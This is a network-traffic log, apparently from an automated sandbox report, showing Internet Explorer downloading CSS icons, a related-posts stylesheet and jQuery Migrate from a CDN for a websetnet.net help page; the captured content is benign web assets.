                                                                                              Data Ascii: l(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9Ii00IC00IDQwIDQwIj48cGF0aCBmaWxsPSIjZmZmIiBkPSJNMTYgMTYuMTZjLTMuNjM1LjAtNi41OC0yLjk0NS02LjU4LTYuNThDOS40MiA1Ljk0NSAxMi4zNjQgMyAxNiAzczYuNTgyIDIuOTQ1ID
                                                                                              2021-12-13 23:57:32 UTC8508INData Raw: 37 66 66 38 0d 0a 4e 79 30 78 4c 6a 41 33 4e 79 41 79 4c 6a 51 74 4c 6a 51 31 4e 79 41 79 4c 6a 63 32 4f 43 34 79 4f 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 4f 75 74 6c 6f 6f 6b 63 6f 6d 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 7a 4d 69 41 7a 4d 69 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69
                                                                                              Data Ascii: 7ff8Ny0xLjA3NyAyLjQtLjQ1NyAyLjc2OC4yOXoiLz48L3N2Zz4=) no-repeat center center}.heateorSssOutlookcomSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAzMiAzMiI+PHBhdGggZmlsbD0i
                                                                                              2021-12-13 23:57:32 UTC8512INData Raw: 53 34 30 4e 44 63 74 4d 53 34 77 4d 54 63 74 4c 6a 55 34 4d 33 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 50 72 69 6e 74 46 72 69 65 6e 64 6c 79 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 7a 4d 69 41 7a 4d 69 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 32 45 35 59 54 6c 68 4f 53 49 67 63 33 52 79
                                                                                              Data Ascii: S40NDctMS4wMTctLjU4M3oiLz48L3N2Zz4=) no-repeat center center}.heateorSssPrintFriendlySvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAzMiAzMiI+PHBhdGggZmlsbD0iI2E5YTlhOSIgc3Ry
                                                                                              2021-12-13 23:57:32 UTC8516INData Raw: 54 45 75 4d 43 41 77 49 44 45 67 4d 54 59 67 4d 6a 56 6a 4c 54 51 75 4f 54 55 75 4d 43 30 35 4c 54 51 75 4d 44 55 74 4f 53 30 35 63 7a 51 75 4d 44 55 74 4f 53 41 35 4c 54 6b 67 4f 53 41 30 4c 6a 41 31 49 44 6b 67 4f 57 45 34 4c 6a 6b 78 4d 69 41 34 4c 6a 6b 78 4d 69 34 77 49 44 41 67 4d 53 30 78 4c 6a 4d 77 4d 69 41 30 4c 6a 59 79 4f 47 77 79 4c 6a 49 35 4d 79 41 78 4c 6a 6b 35 4d 55 45 78 4d 53 34 35 4d 44 67 67 4d 54 45 75 4f 54 41 34 4c 6a 41 67 4d 43 41 77 49 44 49 34 49 44 45 32 59 7a 41 74 4e 69 34 32 4c 54 55 75 4e 43 30 78 4d 69 30 78 4d 69 30 78 4d 6c 4d 30 49 44 6b 75 4e 43 41 30 49 44 45 32 63 7a 55 75 4e 43 41 78 4d 69 41 78 4d 69 41 78 4d 6d 4d 79 4c 6a 51 31 4e 69 34 77 49 44 51 75 4e 7a 51 31 4c 53 34 33 4e 53 41 32 4c 6a 59 31 4d 69 30 79
                                                                                              Data Ascii: TEuMCAwIDEgMTYgMjVjLTQuOTUuMC05LTQuMDUtOS05czQuMDUtOSA5LTkgOSA0LjA1IDkgOWE4LjkxMiA4LjkxMi4wIDAgMS0xLjMwMiA0LjYyOGwyLjI5MyAxLjk5MUExMS45MDggMTEuOTA4LjAgMCAwIDI4IDE2YzAtNi42LTUuNC0xMi0xMi0xMlM0IDkuNCA0IDE2czUuNCAxMiAxMiAxMmMyLjQ1Ni4wIDQuNzQ1LS43NSA2LjY1Mi0y
                                                                                              2021-12-13 23:57:32 UTC8520INData Raw: 7a 4c 53 34 32 4e 7a 63 75 4d 6a 4d 30 4c 53 34 30 4e 53 34 7a 4e 54 49 74 4d 53 34 77 4e 44 4d 75 4d 7a 55 79 4c 54 45 75 4e 7a 68 73 4c 53 34 77 4d 53 30 78 4c 6a 41 79 4e 43 30 75 4d 44 45 33 4c 54 49 75 4e 7a 5a 6a 4c 53 34 77 4e 54 49 74 4d 53 34 32 4e 7a 59 74 4c 6a 41 35 4c 54 49 75 4e 6a 59 79 4c 53 34 78 4d 54 59 74 4d 69 34 35 4e 69 30 75 4d 44 49 33 4c 53 34 79 4f 54 59 74 4c 6a 41 35 4c 53 34 31 4d 7a 67 74 4c 6a 45 35 4e 53 30 75 4e 7a 49 31 4c 53 34 77 4f 44 59 74 4c 6a 45 31 4c 53 34 78 4e 6a 49 74 4c 6a 49 30 4e 69 30 75 4d 6a 4d 74 4c 6a 49 35 4c 53 34 77 4e 6a 55 74 4c 6a 41 30 4e 69 30 75 4d 6a 51 31 4c 53 34 78 4d 54 63 74 4c 6a 55 7a 4f 43 30 75 4d 6a 45 31 4c 53 34 78 4d 7a 67 74 4c 6a 41 7a 4f 43 30 75 4d 6a 55 32 4c 53 34 78 4e 44
                                                                                              Data Ascii: zLS42NzcuMjM0LS40NS4zNTItMS4wNDMuMzUyLTEuNzhsLS4wMS0xLjAyNC0uMDE3LTIuNzZjLS4wNTItMS42NzYtLjA5LTIuNjYyLS4xMTYtMi45Ni0uMDI3LS4yOTYtLjA5LS41MzgtLjE5NS0uNzI1LS4wODYtLjE1LS4xNjItLjI0Ni0uMjMtLjI5LS4wNjUtLjA0Ni0uMjQ1LS4xMTctLjUzOC0uMjE1LS4xMzgtLjAzOC0uMjU2LS4xND
                                                                                              2021-12-13 23:57:32 UTC8524INData Raw: 34 33 4d 44 63 67 4e 69 34 34 4d 7a 49 67 4d 54 55 75 4e 44 45 79 49 44 45 77 4c 6a 6b 79 4e 79 41 78 4f 43 34 78 4d 7a 4d 67 4e 69 34 79 4d 7a 51 67 4d 6a 55 75 4e 7a 51 78 49 44 45 31 4c 6a 51 78 4d 69 41 79 4e 53 34 35 4d 7a 59 67 4d 6a 6b 75 4e 44 51 35 4c 6a 41 67 4d 54 63 75 4e 7a 51 30 4c 54 45 30 4c 6a 41 7a 4e 79 41 7a 4d 43 34 34 4d 44 6b 74 4e 44 45 75 4d 7a 51 34 49 44 4d 77 4c 6a 67 77 4f 53 30 78 4d 69 34 30 4f 44 49 75 4d 43 30 79 4d 79 34 32 4d 44 51 74 4d 69 34 33 4d 6a 45 74 4d 7a 41 75 4f 44 41 35 4c 54 59 75 4e 6a 49 79 54 44 67 33 4c 6a 51 78 4d 69 41 79 4d 44 55 75 4f 44 63 79 65 69 49 67 5a 6d 6c 73 62 44 30 69 49 32 5a 6d 5a 69 49 76 50 6a 78 77 59 58 52 6f 49 47 51 39 49 6b 30 78 4e 7a 49 75 4d 6a 4d 67 4d 54 59 32 4c 6a 67 31 4e
                                                                                              Data Ascii: 43MDcgNi44MzIgMTUuNDEyIDEwLjkyNyAxOC4xMzMgNi4yMzQgMjUuNzQxIDE1LjQxMiAyNS45MzYgMjkuNDQ5LjAgMTcuNzQ0LTE0LjAzNyAzMC44MDktNDEuMzQ4IDMwLjgwOS0xMi40ODIuMC0yMy42MDQtMi43MjEtMzAuODA5LTYuNjIyTDg3LjQxMiAyMDUuODcyeiIgZmlsbD0iI2ZmZiIvPjxwYXRoIGQ9Ik0xNzIuMjMgMTY2Ljg1N
                                                                                              2021-12-13 23:57:32 UTC8528INData Raw: 4d 69 41 30 4c 6a 41 7a 49 44 4d 75 4e 44 4d 79 49 44 55 75 4d 69 41 31 4c 6a 55 7a 4c 6a 4d 75 4e 54 4d 75 4f 54 67 75 4e 54 63 67 4d 53 34 7a 4e 79 30 75 4d 54 6b 34 4c 6a 59 78 4c 54 45 75 4d 69 34 32 4f 43 30 30 4c 6a 55 78 4d 69 30 75 4e 6a 6b 74 4e 69 34 30 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 53 79 6d 62 61 6c 6f 6f 46 65 65 64 73 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41
                                                                                              Data Ascii: MiA0LjAzIDMuNDMyIDUuMiA1LjUzLjMuNTMuOTguNTcgMS4zNy0uMTk4LjYxLTEuMi42OC00LjUxMi0uNjktNi40NXoiLz48L3N2Zz4=) no-repeat center center}.heateorSssSymbalooFeedsSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjA
                                                                                              2021-12-13 23:57:32 UTC8533INData Raw: 63 31 4c 6a 41 67 4e 69 34 35 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 54 77 69 64 64 6c 61 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 5a 70 5a 58 64 43 62 33 67 39 49 6a 41 67 4d 43 41 7a 4d 69 41 7a 4d 69 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 7a 4a 68 4d 6d 45 79 59 53 49 67 5a 44 30 69 54 54 45 77 4c 6a 55 67 4e 53 34 32 4f 44 68
                                                                                              Data Ascii: c1LjAgNi45NXoiLz48L3N2Zz4=) no-repeat center center}.heateorSssTwiddlaSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHZpZXdCb3g9IjAgMCAzMiAzMiI+PHBhdGggZmlsbD0iIzJhMmEyYSIgZD0iTTEwLjUgNS42ODh
                                                                                              2021-12-13 23:57:32 UTC8537INData Raw: 59 67 4e 43 34 77 4f 53 30 35 4c 6a 67 7a 49 44 55 75 4f 44 55 74 4c 6a 49 31 4d 79 34 32 4d 44 55 67 4d 69 34 78 4e 54 51 67 4d 69 34 32 4d 6a 63 67 4f 43 34 31 4d 69 41 79 4c 6a 59 79 4e 79 41 32 4c 6a 59 79 4e 69 34 77 49 44 45 79 4c 54 4d 75 4d 54 51 34 49 44 45 79 4c 54 63 75 4d 54 49 31 63 79 30 31 4c 6a 4d 33 4e 43 30 33 4c 6a 45 79 4e 53 30 78 4d 69 30 33 4c 6a 45 79 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 57 65 62 6e 65 77 73 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78
                                                                                              Data Ascii: YgNC4wOS05LjgzIDUuODUtLjI1My42MDUgMi4xNTQgMi42MjcgOC41MiAyLjYyNyA2LjYyNi4wIDEyLTMuMTQ4IDEyLTcuMTI1cy01LjM3NC03LjEyNS0xMi03LjEyNXoiLz48L3N2Zz4=) no-repeat center center}.heateorSssWebnewsSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWx
                                                                                              2021-12-13 23:57:32 UTC8540INData Raw: 34 34 63 32 0d 0a 67 4d 43 41 7a 4d 69 41 7a 4d 69 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 32 5a 6d 5a 69 49 67 5a 44 30 69 54 54 49 78 4c 6a 51 35 4e 53 41 32 4c 6a 41 35 4e 32 4d 78 4c 6a 41 35 4c 6a 4d 78 49 44 49 75 4d 6a 45 7a 4c 6a 49 34 49 44 4d 75 4d 7a 41 30 4c 6a 42 73 4c 54 63 75 4e 44 45 34 49 44 45 79 4c 6a 41 35 64 6a 6b 75 4f 54 46 6a 4c 53 34 30 4e 6a 67 74 4c 6a 45 31 4e 53 30 75 4f 54 4d 31 4c 53 34 79 4d 69 30 78 4c 6a 4d 33 4c 53 34 79 4d 69 30 75 4e 44 63 75 4d 43 30 75 4f 54 4d 33 4c 6a 41 32 4e 53 30 78 4c 6a 51 77 4e 43 34 79 4d 6e 59 74 4f 53 34 35 4d 55 77 33 4c 6a 45 35 49 44 59 75 4d 44 6b 33 59 7a 45 75 4d 44 6b 75 4d 6a 67 67 4d 69 34 79 4d 54 4d 75 4d 7a 45 67 4d 79 34 7a 4d 44 51 75 4d 47 77 31 4c 6a 55 78
                                                                                              Data Ascii: 44c2gMCAzMiAzMiI+PHBhdGggZmlsbD0iI2ZmZiIgZD0iTTIxLjQ5NSA2LjA5N2MxLjA5LjMxIDIuMjEzLjI4IDMuMzA0LjBsLTcuNDE4IDEyLjA5djkuOTFjLS40NjgtLjE1NS0uOTM1LS4yMi0xLjM3LS4yMi0uNDcuMC0uOTM3LjA2NS0xLjQwNC4yMnYtOS45MUw3LjE5IDYuMDk3YzEuMDkuMjggMi4yMTMuMzEgMy4zMDQuMGw1LjUx
                                                                                              2021-12-13 23:57:32 UTC8544INData Raw: 6a 41 7a 4c 54 45 75 4e 6a 51 74 4d 69 34 31 4f 54 67 74 4d 79 34 7a 4f 44 67 74 4d 69 34 31 4f 54 68 49 4e 53 34 35 4e 48 59 31 4c 6a 4d 35 4e 58 70 74 4d 6a 49 75 4d 44 45 33 4c 54 45 75 4f 44 4d 7a 51 7a 49 33 4c 6a 51 31 4d 79 41 79 4d 69 34 32 4e 53 41 79 4e 53 34 32 4e 6a 4d 67 4d 6a 51 67 4d 6a 4d 75 4d 54 49 33 49 44 49 30 59 79 30 7a 4c 6a 59 77 4e 79 34 77 4c 54 55 75 4d 7a 45 74 4d 69 34 30 4f 53 30 31 4c 6a 51 79 4d 69 30 31 4c 6a 6b 30 4e 43 34 77 4c 54 4d 75 4d 7a 67 32 49 44 49 75 4d 6a 4d 74 4e 53 34 34 4e 7a 67 67 4e 53 34 7a 4d 53 30 31 4c 6a 67 33 4f 43 41 30 49 44 41 67 4e 53 34 79 4d 6a 55 67 4d 79 34 33 4e 43 41 31 4c 6a 45 78 4e 69 41 32 4c 6a 51 33 61 43 30 34 4c 6a 51 31 4e 57 4d 74 4c 6a 41 32 4e 79 41 78 4c 6a 6b 32 4e 69 41 78
                                                                                              Data Ascii: jAzLTEuNjQtMi41OTgtMy4zODgtMi41OThINS45NHY1LjM5NXptMjIuMDE3LTEuODMzQzI3LjQ1MyAyMi42NSAyNS42NjMgMjQgMjMuMTI3IDI0Yy0zLjYwNy4wLTUuMzEtMi40OS01LjQyMi01Ljk0NC4wLTMuMzg2IDIuMjMtNS44NzggNS4zMS01Ljg3OCA0IDAgNS4yMjUgMy43NCA1LjExNiA2LjQ3aC04LjQ1NWMtLjA2NyAxLjk2NiAx
                                                                                              2021-12-13 23:57:32 UTC8548INData Raw: 43 34 79 49 44 45 77 4c 6a 49 75 4d 43 41 77 49 44 45 67 4d 69 34 35 4f 54 59 67 4e 79 34 79 4e 54 56 6f 4e 43 34 79 59 7a 41 74 4e 79 34 35 4e 6a 49 74 4e 69 34 30 4e 79 30 78 4e 43 34 30 4e 43 30 78 4e 43 34 30 4d 69 30 78 4e 43 34 30 4e 48 59 30 4c 6a 45 35 4d 33 70 74 4c 6a 41 77 4e 79 30 33 4c 6a 51 7a 4d 6d 4d 35 4c 6a 63 79 4e 43 34 77 49 44 45 33 4c 6a 59 7a 4e 69 41 33 4c 6a 6b 7a 4d 69 41 78 4e 79 34 32 4d 7a 59 67 4d 54 63 75 4e 6a 67 79 53 44 49 33 51 7a 49 33 49 44 45 30 4c 6a 67 78 4d 69 41 78 4e 79 34 79 4d 44 4d 67 4e 53 41 31 4c 6a 45 32 49 44 56 32 4e 43 34 78 4f 54 4e 36 49 69 38 2b 50 43 39 6e 50 6a 77 76 63 33 5a 6e 50 67 3d 3d 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73
                                                                                              Data Ascii: C4yIDEwLjIuMCAwIDEgMi45OTYgNy4yNTVoNC4yYzAtNy45NjItNi40Ny0xNC40NC0xNC40Mi0xNC40NHY0LjE5M3ptLjAwNy03LjQzMmM5LjcyNC4wIDE3LjYzNiA3LjkzMiAxNy42MzYgMTcuNjgySDI3QzI3IDE0LjgxMiAxNy4yMDMgNSA1LjE2IDV2NC4xOTN6Ii8+PC9nPjwvc3ZnPg==) no-repeat center center}.heateorSs
                                                                                              2021-12-13 23:57:32 UTC8552INData Raw: 4c 54 49 75 4d 54 59 67 4e 69 34 7a 4d 6a 68 6a 4c 53 34 78 4e 54 49 75 4e 44 51 7a 4c 53 34 30 4e 79 34 33 4d 44 59 74 4c 6a 67 34 4e 79 34 33 4d 44 5a 6f 4c 53 34 78 4e 6a 56 6a 4c 53 34 30 4d 54 55 75 4d 43 30 75 4e 7a 49 74 4c 6a 49 32 4d 79 30 75 4f 44 67 33 4c 53 34 33 4d 44 5a 73 4c 54 49 75 4f 44 59 31 4c 54 67 75 4d 44 4d 79 65 69 49 76 50 6a 77 76 5a 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 63 65 6e 74 65 72 7d 2e 68 65 61 74 65 6f 72 53 73 73 50 61 72 6c 65 72 53 76 67 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 38 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44
                                                                                              Data Ascii: LTIuMTYgNi4zMjhjLS4xNTIuNDQzLS40Ny43MDYtLjg4Ny43MDZoLS4xNjVjLS40MTUuMC0uNzItLjI2My0uODg3LS43MDZsLTIuODY1LTguMDMyeiIvPjwvZz48L3N2Zz4=) no-repeat center center}.heateorSssParlerSvg{background:url(data:image/svg+xml;charset=utf8;base64,PHN2ZyB4bWxucz0iaHR0cD
                                                                                              2021-12-13 23:57:32 UTC8556INData Raw: 34 77 4d 7a 63 33 49 44 49 78 4c 6a 59 30 4e 7a 45 67 4d 54 49 75 4f 44 49 79 4d 53 41 79 4d 53 34 32 4f 44 63 33 49 44 45 79 4c 6a 59 77 4d 7a 4d 67 4d 6a 45 75 4e 7a 49 34 4d 79 41 78 4d 69 34 30 4e 6a 49 33 49 44 49 78 4c 6a 6b 79 4d 6a 45 67 4d 54 49 75 4e 54 41 77 4d 69 41 79 4d 69 34 78 4d 54 55 34 54 44 45 7a 4c 6a 41 31 4e 6a 51 67 4d 6a 51 75 4e 54 45 31 4f 45 67 78 4d 79 34 7a 4f 44 51 32 51 7a 45 7a 4c 6a 51 34 4d 54 51 67 4d 6a 55 75 4d 44 55 77 4d 69 41 78 4d 79 34 31 4e 44 4d 35 49 44 49 31 4c 6a 51 79 4e 54 49 67 4d 54 4d 75 4e 54 63 34 4d 79 41 79 4e 53 34 32 4d 6a 67 7a 53 44 45 30 4c 6a 45 79 4f 44 4e 44 4d 54 51 75 4d 6a 4d 78 4e 43 41 79 4e 69 34 32 4e 54 4d 7a 49 44 45 31 4c 6a 49 78 4f 44 6b 67 4d 7a 59 75 4d 54 49 79 4d 53 41 78 4e
                                                                                              Data Ascii: 4wMzc3IDIxLjY0NzEgMTIuODIyMSAyMS42ODc3IDEyLjYwMzMgMjEuNzI4MyAxMi40NjI3IDIxLjkyMjEgMTIuNTAwMiAyMi4xMTU4TDEzLjA1NjQgMjQuNTE1OEgxMy4zODQ2QzEzLjQ4MTQgMjUuMDUwMiAxMy41NDM5IDI1LjQyNTIgMTMuNTc4MyAyNS42MjgzSDE0LjEyODNDMTQuMjMxNCAyNi42NTMzIDE1LjIxODkgMzYuMTIyMSAxN
                                                                                              2021-12-13 23:57:32 UTC8557INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              16192.168.2.349777104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8501OUTGET /css/websetnet.net/wp-content/plugins/yet-another-related-posts-plugin/style/related.css HTTP/1.1
                                                                                              Accept: text/css, */*
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8594INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: text/css
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a6ba531f31-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176186
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"b2a1e0dc83b210f03ce286f2000ccde58b827bd950477c6356969864078133aa"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-BO-LB-Server: LA-154
                                                                                              X-Cache: MISS, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-lga13628-LGA, cache-fra19152-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8595INData Raw: 31 33 33 0d 0a 2e 79 61 72 70 70 2d 72 65 6c 61 74 65 64 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 65 6d 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 65 6d 7d 2e 79 61 72 70 70 2d 72 65 6c 61 74 65 64 20 61 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 79 61 72 70 70 2d 72 65 6c 61 74 65 64 20 2e 79 61 72 70 70 2d 74 68 75 6d 62 6e 61 69 6c 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 39 36 25 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 2e 79 61 72 70 70 2d 72 65 6c 61 74 65 64 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 35 25 3b 66 6f 6e 74 2d 77 65 69 67 68
                                                                                              Data Ascii: 133.yarpp-related{margin-bottom:1em;margin-top:1em}.yarpp-related a{font-weight:700;text-decoration:none}.yarpp-related .yarpp-thumbnail-title{font-size:96%;font-weight:700;text-align:left;text-decoration:none}.yarpp-related h3{font-size:125%;font-weigh
                                                                                              2021-12-13 23:57:32 UTC8595INData Raw: 30 0d 0a 0d 0a
                                                                                              Data Ascii: 0


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              17192.168.2.349779104.16.18.94443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2021-12-13 23:57:32 UTC8502OUTGET /wp/c/5.8.2/wp-includes/js/jquery/jquery-migrate.min.js HTTP/1.1
                                                                                              Accept: application/javascript, */*;q=0.8
                                                                                              Referer: https://websetnet.net/pt/fix-there-was-an-error-opening-this-document/?utm_source=google
                                                                                              Accept-Language: en-US
                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              Host: cdn.statically.io
                                                                                              Connection: Keep-Alive
                                                                                              2021-12-13 23:57:32 UTC8557INHTTP/1.1 200 OK
                                                                                              Date: Mon, 13 Dec 2021 23:57:32 GMT
                                                                                              Content-Type: application/javascript; charset=utf-8
                                                                                              Transfer-Encoding: chunked
                                                                                              Connection: close
                                                                                              CF-Ray: 6bd322a6b9b668fe-FRA
                                                                                              Access-Control-Allow-Origin: *
                                                                                              Age: 176211
                                                                                              Cache-Control: public, max-age=31536000, immutable
                                                                                              ETag: W/"0a4aad45cdf86d7880aa2fda9a0bc4012c128b45227c1ca315dcf991f5e6c4ce"
                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                              Vary: Accept-Encoding
                                                                                              CF-Cache-Status: HIT
                                                                                              Access-Control-Expose-Headers: *
                                                                                              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                              Timing-Allow-Origin: *
                                                                                              X-Cache: HIT, HIT
                                                                                              X-Content-Type-Options: nosniff
                                                                                              X-Served-By: cache-sjc10053-SJC, cache-fra19129-FRA
                                                                                              Server: cloudflare
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              2021-12-13 23:57:32 UTC8558INData Raw: 32 62 64 38 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 33 2e 32 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f
